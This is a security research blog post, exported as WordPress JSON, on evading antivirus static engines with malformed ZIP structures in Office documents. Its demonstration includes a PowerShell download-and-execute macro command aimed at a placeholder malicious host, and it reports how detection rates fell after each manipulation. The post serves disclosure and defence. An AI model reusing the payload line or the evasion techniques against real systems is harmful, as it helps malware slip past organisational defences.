{"id":280,"date":"2020-12-24T10:28:45","date_gmt":"2020-12-24T10:28:45","guid":{"rendered":"https:\/\/arielkoren.com\/blog\/?p=280"},"modified":"2025-01-03T15:56:33","modified_gmt":"2025-01-03T15:56:33","slug":"forging-malicious-doc","status":"publish","type":"post","link":"https:\/\/arielkoren.com\/blog\/2020\/12\/24\/forging-malicious-doc\/","title":{"rendered":"Forging malicious DOC, undetected by all VirusTotal static engines"},"content":{"rendered":"\n<p>Static engines have become a standard part of automated detection in large enterprises thanks to their speed and accuracy. Email attacks account for 91% of all cyberattack attempts on enterprise organizations. If an attacker finds a way through the organization\u2019s defenses, the organization can be compromised, with potential damage in the millions of dollars.<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>Today, most email attachments are documents, such as Microsoft Office Word and Excel files (docx, xlsx, xlsm, etc.). Modern Microsoft Office files appear to have a special structure, but in reality they are just ZIP archives containing the document\u2019s text, media, and structure.<br>Because all of these files are potential attack vectors against organizations, detection engines must parse them correctly to detect exploitation attempts and attacks on enterprises.<\/p>\n\n\n\n<p>In this blog post I will cover ways to exploit security vendors\u2019 static detection engines, focusing on the ZIP file format: how it is parsed, how different parsers can fail to detect malicious content, and how attackers can potentially bypass detection engines and infiltrate the organization. Finally, I will present an in-the-wild example of an attack exploiting such techniques.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Basics<\/h2>\n\n\n\n<p>Before we dive into the technical details, let&#8217;s first go over the basics of the ZIP file format. 
I will not cover the entire ZIP file structure in this blog post; the focus is on how file contents are parsed and how that parsing can be exploited. Here is a hex snippet of a simple ZIP file containing two files, <em>file1<\/em> and <em>file2<\/em>. Each part beginning with <em>PK<\/em> marks the start of a new header. For simplicity and readability, no compression was used for these files (compression method: Store).<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"367\" src=\"https:\/\/lh4.googleusercontent.com\/u1f4wyKJtKMhQpqyrczQKkRgStK7E04HffSMWKyMDDzvSQ1Sxk4nx2kl9sxcRZaalTLVAd75BXjsvZ91k7CTCTcP4Gkto7ATr6EquwI_YRR7HaDELMk6JPRqDNuzDQkalPQq7Iba\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: Local File Header entry of file <em>file2<\/em><br><strong><span style=\"color:#0ca300\" class=\"has-inline-color\">GREEN<\/span><\/strong>: Local File Header entry of file <em>file1<\/em><br><strong><span class=\"has-inline-color has-vivid-cyan-blue-color\">BLUE<\/span><\/strong>: Central Directory File Header of <em>file2<\/em><br><strong><span style=\"color:#ffa600\" class=\"has-inline-color\">ORANGE<\/span><\/strong>: Central Directory File Header of <em>file1<\/em><br>The remaining data is the End of Central Directory record, which closes the archive.<\/p>\n\n\n\n<p>Each Local File Header contains metadata about the file, such as the file name, data length, compression method and more. The actual file content follows the metadata. 
For example, in the first file header entry:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"109\" src=\"https:\/\/lh3.googleusercontent.com\/jVi9SkGsacE81s50oe8cO8-kg7xax0x178OPjFsPGZwaUSnyhQ6_m6frZT-BXbuAPeQUThEx6gbRHzMmsG2F4fr8gU1PCp326faA8ENrj8SODZhQSo4hbJAX3CKXz4eilO9_rmYS\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-cyan-blue-color\">BLUE<\/span><\/strong>: Metadata<br><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: File name<br><strong><span style=\"color:#03a300\" class=\"has-inline-color\">GREEN<\/span><\/strong>: File content<br><em>More information about the file format can be found on <a href=\"https:\/\/en.wikipedia.org\/wiki\/Zip_(file_format)\">Wikipedia<\/a>.<\/em><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>File buffers collapsing<\/strong><\/h2>\n\n\n\n<p>Some engines parse archives using the <em>Central Directory File Header<\/em>, while others walk through the Local File Headers one after the other. Calculating the size of each <em>Local File Header<\/em> record is simple: add the fixed 30-byte header size, the file name length, the extra field length, and the compressed data length. This way you can go through all the file headers until reaching the <em>Central Directory File Header<\/em>. Another method is to simply search for the Central Directory File Header magic, which is <strong>0x02014B50<\/strong>.<\/p>\n\n\n\n<p>Let&#8217;s examine the <em>Central Directory File Header<\/em> hexdump:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"144\" src=\"https:\/\/lh4.googleusercontent.com\/0SrlWK5qYH23SnAjZufS-yxA8_hufZAIilB2zeMDEcmIAEzIe9-aoiEFEDJlyKdeYDyaGfsvpxbJ_HoZfpbwefs0hBWjsKHYfbW0yX1nfLHnqnG0uWbzxlIXVWRQz10gnCAQbQoC\"><\/p>\n\n\n\n<p>In red is the offset, from the beginning of the file, of the corresponding <em>Local File Header<\/em>. 
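<\/p>\n\n\n\n<p>The two parsing strategies described above can be sketched in Python. This is a minimal, defensive sketch under stated assumptions, not any vendor\u2019s engine: the function names <em>walk_local_headers<\/em>, <em>read_central_directory<\/em> and <em>compare_views<\/em> are hypothetical, and the code assumes a simple archive without ZIP64 records, encryption, or data descriptors. Running both strategies on the same bytes and comparing the file names each one sees is one way to notice the kind of parser disagreement this post exploits: a header hidden inside another file\u2019s data is only visible through the Central Directory, while a Local File Header with no directory entry is only visible to the walk.<\/p>

```python
# Minimal, defensive sketch: compare two ways of listing ZIP entries.
# Assumes no ZIP64, no encryption and no data descriptors (flag bit 3).
LOCAL_SIG = 0x04034B50    # PK 03 04: Local File Header
CENTRAL_SIG = 0x02014B50  # PK 01 02: Central Directory File Header
EOCD_SIG = 0x06054B50     # PK 05 06: End of Central Directory record


def u16(data, off):
    # ZIP integers are little-endian.
    return int.from_bytes(data[off:off + 2], 'little')


def u32(data, off):
    return int.from_bytes(data[off:off + 4], 'little')


def walk_local_headers(data):
    # Strategy 1: start at offset 0 and hop from one Local File Header to the next.
    names, off = [], 0
    while off + 30 <= len(data) and u32(data, off) == LOCAL_SIG:
        comp_size = u32(data, off + 18)
        name_len = u16(data, off + 26)
        extra_len = u16(data, off + 28)
        names.append(data[off + 30:off + 30 + name_len].decode('utf-8', 'replace'))
        # Next record = fixed 30-byte header + name + extra field + compressed data.
        off += 30 + name_len + extra_len + comp_size
    return names


def read_central_directory(data):
    # Strategy 2: find the last End of Central Directory record and read the
    # Central Directory entries that precede it.
    eocd = data.rfind(EOCD_SIG.to_bytes(4, 'little'))
    if eocd == -1:
        raise ValueError('no End of Central Directory record')
    count = u16(data, eocd + 10)    # total number of entries
    cd_size = u32(data, eocd + 12)  # size of the Central Directory in bytes
    off = eocd - cd_size            # tolerates bytes prepended to the archive
    entries = []
    for _ in range(count):
        if u32(data, off) != CENTRAL_SIG:
            raise ValueError('bad Central Directory entry at offset %d' % off)
        name_len = u16(data, off + 28)
        extra_len = u16(data, off + 30)
        comment_len = u16(data, off + 32)
        local_off = u32(data, off + 42)  # offset of the entry's Local File Header
        name = data[off + 46:off + 46 + name_len].decode('utf-8', 'replace')
        entries.append((name, local_off))
        off += 46 + name_len + extra_len + comment_len
    return entries


def compare_views(data):
    # Report names that only one of the two strategies can see.
    local = set(walk_local_headers(data))
    central = {name for name, _ in read_central_directory(data)}
    return {'local_only': sorted(local - central),
            'central_only': sorted(central - local)}
```

<p>A name seen by only one of the two views is a signal worth investigating rather than proof of malice, since this sketch does not handle every legitimate ZIP variant.<\/p>\n\n\n\n<p>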
It is therefore also possible to parse the ZIP file contents starting from the <em>Central Directory File Header<\/em>, by following each file\u2019s offset.<\/p>\n\n\n\n<p>Because different engines parse archives differently, it is possible to insert hidden files that some parsers will detect and others will miss.<br><br>By adding a crafted file header inside another file\u2019s content, it is possible to create an archive in which some parsers see an extra file and others do not. Here is a hexdump of a simple variant of such a crafted file:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"153\" src=\"https:\/\/lh4.googleusercontent.com\/6z8a-6HXO-GM7ZOQmlqz-hKV3-q-7Gh-Cq_UhXltEr3YK1DSCYQhFDaobGWj4n2wz4tIkPm8uZs-TBFTF3PVokvWDPi2TWwWsQw5v1wgS_RfH-voHCtHl2_O1wlbBcRrpCDtv2xI\"><\/p>\n\n\n\n<p><strong><span class=\"has-inline-color has-vivid-red-color\">RED<\/span><\/strong>: The original file\u2019s length; its original content was the letter \u201cB\u201d repeated 320 (0x140) times.&nbsp;<br><strong><span style=\"color:#00c206\" class=\"has-inline-color\">GREEN<\/span><\/strong>: Inside the original file\u2019s content, a new crafted PK header was created, describing a new file with different content and a different file name (<em>file9<\/em>). Another <em>Central Directory File Header<\/em> entry is then added at the end of the ZIP file, pointing to the crafted header as if it were a legitimate file. Some parsers will see the content of <em>file9<\/em>, while others will ignore it and parse the original file as a whole.<\/p>\n\n\n\n<p>The buffer collapsing attack can get more complicated, with one file containing several other files. 
See the illustrations below for examples:<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"160\" src=\"https:\/\/lh3.googleusercontent.com\/cYaxa-xkvHKAbCY_4SO_1LENzH_P1Jr0kCIjJatvvEC7MpvyKSPluOifVv_NWS8XPq6x0b13Fnv1Vzmehrp98fInhWOPlP-BFPDmxB5QaxT3piYGd2M5AO6r0HeS2fgYkBR_Aeio\"><\/p>\n\n\n\n<p class=\"has-text-align-center\">And the corresponding Central Directory File Header:<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/B-Gz6wFirEVUBfZKiA_JT7PcSBkfOeaDdYQsFmEhWiaitK6YG3ETkz0XtxS8u8OcGGYzU346m5iO1MK4323Q8L39MbyZd4ImV1wudCLs6mJp2PxFB0ksNdYiaMJCFdzk8MK6_eI7\" width=\"624\" height=\"109\"><\/p>\n\n\n\n<p>The results of extracting the crafted ZIP file vary between extractors, and even between versions of the same extractor, so the file can effectively bypass different engines depending on how they parse it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Ghost File<\/strong><\/h2>\n\n\n\n<p>In the previous method, we added a crafted file between seemingly legitimate files, and by changing the <em>Central Directory File Header<\/em> content, we pointed to our crafted buffer so that different parsers would extract different content.<\/p>\n\n\n\n<p>In this method we attack ZIP file parsers from a different angle. Instead of adding a pointer to a crafted file in the <em>Central Directory File Header<\/em>, we simply add a <em>Local File Header Record<\/em> for a new file without adding any pointer to it in the <em>Central Directory File Header<\/em>. Parsers that list files from the <em>Central Directory File Header<\/em> will not see the file at all, while parsers that enumerate every <em>Local File Header<\/em> will.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Invalid File Header<\/strong><\/h2>\n\n\n\n<p>Some engines stop their analysis as soon as they encounter unexpected data. 
Other parsing engines, like Microsoft Office, make a best effort to analyze the rest of the file. Adding a simple corrupted header, with an invalid CRC, a length field set to 0xFFFF (the maximum value), and a short file name that does not reach that length, produces a corrupted file header that disrupts static engines. Here is a hexdump of such a Local File Header:<br><img loading=\"lazy\" decoding=\"async\" width=\"540\" height=\"84\" src=\"https:\/\/lh4.googleusercontent.com\/ndPqu1x5JQJRfWG4Gz18sn_Q3rXk2rxN-O2rOPLZM0V6Yow24fhBhZcTw0SOW9tkuHO66k7-ImIoKF5yuNRNi4dotTsMtCQU3glxn1a-ByVWqPdOdWCyXatY0vrncBOk9zARbTlB\"><\/p>\n\n\n\n<p><strong>Implementation example of the Central Directory File Header adjusting attack<\/strong><\/p>\n\n\n\n<p>We created a simple Word document with a macro that executes the following command:<\/p>\n\n\n\n<pre class=\"wp-block-verse\"><em>powershell.exe \"\"IEX ((new-object net.webclient).downloadstring('http:\/\/my_malicious.com\/payload.exe '))\"\"<\/em><\/pre>\n\n\n\n<p>Result on VirusTotal:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/7KfSa4TyYqCBYqJD9_eymU7rLJKJHQs9KLy4UioY050bCQXVTSfl41nvxWq6y3Fd6y6dAObCTKfX1MtDMyYL8zUpsSFeqxjA4gzsXbGzsWxjno6sk1xQm89WxrkSOKH00tDI5unt\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>Only 33\/59 engines detected the file.<\/p>\n\n\n\n<p>After simply changing the Central Directory File Header to remove the entry for vbaProject.bin, the file containing all the macros, the results are striking:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/fzBEVz8QTyWmZ5tHX0KHiMfgmf9lq6rvzP90dTgJC4zzunMU_Y5Ngkn3dmbaOruj0Uls38WA7XGyyy3ZWVLEDUhSJGKgh7axwWCbBS3Z3pg_ENMm7Z7vv7qSjKjhJMnizThmZ5Td\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>Only 17\/59 engines detected the malicious macro, roughly a 50% drop from a single change to the document file. 
When the document is opened in Word, the malicious behavior is unchanged. The only difference is that Word asks the user whether to recover the file:<br><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"71\" src=\"https:\/\/lh5.googleusercontent.com\/WqGoKnZDMkk_MYzqzPZ54GK8tOItwQqx3e6XZ9mDoK4u6ZUEGitf_zxdoTxdZdqd4WGdpxPrKqGS6IGLC0nY13C3lLqiS80bnwpazfrcQfJOOPnxfgF4FT2y0MvEj6xYkNEwRHTC\"><\/p>\n\n\n\n<p>Clicking Yes executes all macros as usual.<\/p>\n\n\n\n<p>To reduce detection even further, an invalid header with a bad CRC, as explained earlier, was added to the <em>Local File Headers<\/em>. This reduced detection to 1 out of 61 VirusTotal static engines:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/T3jQRp6xbLfWYT_g0ZkCMujhZaBTBogXNQypq-NqHlid9LBAq_EtXdvhS2iSWr1vv3eRX3DebvVCJsmkZkaSrkMBHyx7ftSCsdVqPjOJJnvQoSzagqwQ_OGSq9YukvWNwYxbxi9o\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>The file\u2019s dynamic behavior remained malicious, with the same PowerShell download-and-execute behavior.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Corrupted ZIP File: Exploiting the End of Central Directory Record in Real Malware in the Wild<\/strong><\/h2>\n\n\n\n<p>Mimecast\u2019s research team found in-the-wild attacks that alter the ZIP structure in a way that causes different parsing engines to fail, while Microsoft Office succeeds. A regular ZIP file is made of several different kinds of headers.<br>It starts with the <em>Local File Header<\/em> entries, which contain both metadata and file contents. Next come the <em>Central Directory File Header<\/em> entries, which describe the file tree inside the ZIP file. 
Finally, the archive is closed by an <em>End of Central Directory Header<\/em> entry, which marks the end of the information in the ZIP file; it is the very last header of a regular ZIP archive.<\/p>\n\n\n\n<p>However, in the analyzed attack, the attacker altered the <em>Central Directory File Header<\/em> entries so that they contain invalid data when parsed, and followed them with an <em>End of Central Directory Header<\/em> entry, which looks like the end of the ZIP file to some parsers. After this ending header, duplicated and corrected <em>Central Directory File Header<\/em> entries are added, followed by a second <em>End of Central Directory Header<\/em> entry. This fools parsers that do not try to parse the remaining headers into using the invalid data.<\/p>\n\n\n\n<p>In the illustration below you can see the <em>End of Central Directory header<\/em> followed by more data, which would not normally be there. Some parsers do not try to read the data that comes after this header, unlike Microsoft Office, whose parser tries to extract as much information as possible from the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/O5brBqZNSAO1mioYq6UWNFTApxsXFGG8t-hNBhGAgH27hp388eLiKCZO581LAq4kBmKsvirqqIOb57BGYBuco8KgSiA9uAY1w3k5wp66fhWQxkk9mPBXn0XPkIf-fM__rxSrLAxF\" alt=\"\"\/><\/figure>\n\n\n\n<p>The <em>End of Central Directory header<\/em> begins with <strong>0x06054B50<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Below you can find an annotated illustration of the attack. The <em>Local File Headers<\/em> are accurate and contain valid data for the files inside the ZIP structure. They are followed by corrupted, incorrect <em>Central Directory File Headers<\/em> and a fake <em>End of Central Directory header<\/em>, which makes parsers end their content evaluation there. 
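<\/p>\n\n\n\n<p>One way a scanner might notice the fake-ending trick is to keep reading past the first End of Central Directory record. The following Python sketch is a defensive heuristic under stated assumptions, not Mimecast\u2019s or Microsoft Office\u2019s logic: the function names <em>find_eocd_records<\/em> and <em>eocd_anomalies<\/em> are hypothetical, and because the 0x06054B50 signature can also occur by chance inside compressed file data, a hit should be treated as a reason for deeper parsing rather than as a verdict.<\/p>

```python
# Minimal, defensive heuristic: list every End of Central Directory (EOCD)
# record instead of trusting the first one found.
EOCD_SIG = (0x06054B50).to_bytes(4, 'little')  # PK 05 06
EOCD_FIXED_SIZE = 22                            # EOCD length without its comment


def find_eocd_records(data):
    # Return (start, end) for every plausible EOCD record, scanning forward.
    records, pos = [], data.find(EOCD_SIG)
    while pos != -1:
        if pos + EOCD_FIXED_SIZE <= len(data):
            comment_len = int.from_bytes(data[pos + 20:pos + 22], 'little')
            records.append((pos, pos + EOCD_FIXED_SIZE + comment_len))
        pos = data.find(EOCD_SIG, pos + 1)
    return records


def eocd_anomalies(data):
    # Human-readable findings; an empty list means nothing unusual was seen.
    records = find_eocd_records(data)
    if not records:
        return ['no EOCD record']
    findings = []
    if len(records) > 1:
        starts = [start for start, _ in records]
        findings.append('%d EOCD records at offsets %s' % (len(records), starts))
    first_end = records[0][1]
    if first_end < len(data):
        findings.append('%d bytes after the first EOCD record' % (len(data) - first_end))
    return findings
```

<p>On a file laid out as described in this section, the first record found would be expected to be the fake one, and the duplicated Central Directory together with the second record would be reported as trailing bytes.<\/p>\n\n\n\n<p>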
The fake <em>End of Central Directory header<\/em> is followed by the correct <em>Central Directory File Headers<\/em>, which describe the actual content of the files.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/dPV-bR9TpI2szo4M2wlOR_37vuKBFfc43ZmRX8Sa3mQdw5sHr7joNDl2Ii5QFbUpiwu7IQkavd88yso45eOQgZKXvOWA6T3gbESlkR9Y6FwIDvpmwtxHW0SZanD1uHTqpE7eAmL3\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>In-the-wild samples (SHA-256):<\/p>\n\n\n\n<ul class=\"wp-block-list\" id=\"block-20495f09-01e4-47df-9384-ad0e012fa1fd\"><li>97a363e1829277d24dd6d212f486023f1e30d451ca4a2d7fb49de5a52bbed7ed<\/li><li>e707411036cf105d8b634e4f104f6bb1c95be8b4dcf574bdb5b2a265c6818233<\/li><li>ecb9cfea13863f38b404040da47cb85f7b7bb27641783db56e560072c824d14b<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Static engines have become a standard part of automated detection in large enterprises thanks to their speed and accuracy. Email attacks account for 91% of all cyberattack attempts on enterprise organizations. 
If an attacker finds a way through the organization\u2019s defenses, the organization can be compromised, with potential&#8230; <\/p>\n<div class=\"read-more navbutton\"><a href=\"https:\/\/arielkoren.com\/blog\/2020\/12\/24\/forging-malicious-doc\/\">Read More<i class=\"fa fa-angle-double-right\"><\/i><\/a><\/div>\n","protected":false},"author":2,"featured_media":296,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[37,5],"tags":[36,34,35,38,10,33,42,9,31,43,32],"class_list":["post-280","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bypass","category-malware","tag-bypass","tag-doc","tag-docm","tag-docx","tag-malware","tag-office","tag-office365","tag-reverse-engineering","tag-static-engines","tag-virustotal","tag-zip"],"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"https:\/\/i0.wp.com\/arielkoren.com\/blog\/wp-content\/uploads\/2020\/12\/word.jpg?fit=1200%2C750&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p849zO-4w","_links":{"self":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/comments?post=280"}],"version-history":[{"count":11,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280\/revisions"}],"predecessor-version":[{"id":363,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/posts\/280\/revisions\/363"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/media\/296"}],"wp:attachment":[{"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/media?parent=280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/categories?post=280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arielkoren.com\/blog\/wp-json\/wp\/v2\/tags?post=280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}